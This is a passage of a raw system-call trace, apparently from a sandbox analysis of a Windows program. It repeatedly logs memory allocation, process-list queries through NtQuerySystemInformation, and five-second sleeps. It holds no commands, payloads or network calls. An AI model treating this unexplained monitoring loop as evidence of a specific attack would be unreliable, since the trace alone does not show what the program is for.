RegionSize=0xdea68*=0x10000) returned 0x0 [0230.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.514] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.525] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.617] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 